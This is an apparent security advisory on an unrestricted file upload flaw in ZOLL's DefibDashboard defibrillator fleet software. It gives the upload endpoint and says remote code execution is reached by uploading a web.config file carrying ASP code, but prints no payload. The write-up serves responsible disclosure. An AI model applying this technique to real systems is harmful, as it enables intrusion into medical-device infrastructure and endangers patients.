ZOLL DefibDashboard Unrestricted Upload
ZOLL's DefibDashboard is a fleet management software for the R-Series of defibrillators. The Wi-Fi enabled defibrillators upload regular maintenance and diagnostic information to this dashboard system for readiness monitoring by biomedical engineering teams.
In affected versions of DefibDashboard a low-privileged user can upload dangerous files to the Device Check File (DCF) facility, resulting in the ability to execute arbitrary commands on the underlying operating system.
For details on this and other responsibly disclosed DefibDashboard vulnerabilities see https://us-cert.cisa.gov/ics/advisories/icsma-21-161-01.
Files submitted to the DCK facility (at /DefibDashboard/Upload.aspx) are saved to the 'Upload' directory directly beneath the web root (at /DefibDasboard/Upload/).
Web config payload
Because the application places unchecked user-controlled files in an executable environment under the web root, a threat actor can upload a file containing ASP.NET code and the server will process the directives, resulting in remote code execution (RCE).
In this case, the DefibDashboard application ships in a precompiled state (updatable=false) so simply uploading a new ASPX file into the web root does not result in code execution. Execution is achieved in the context of IIS by uploading a web.config file embedded with ASP code. This technique is discussed further Here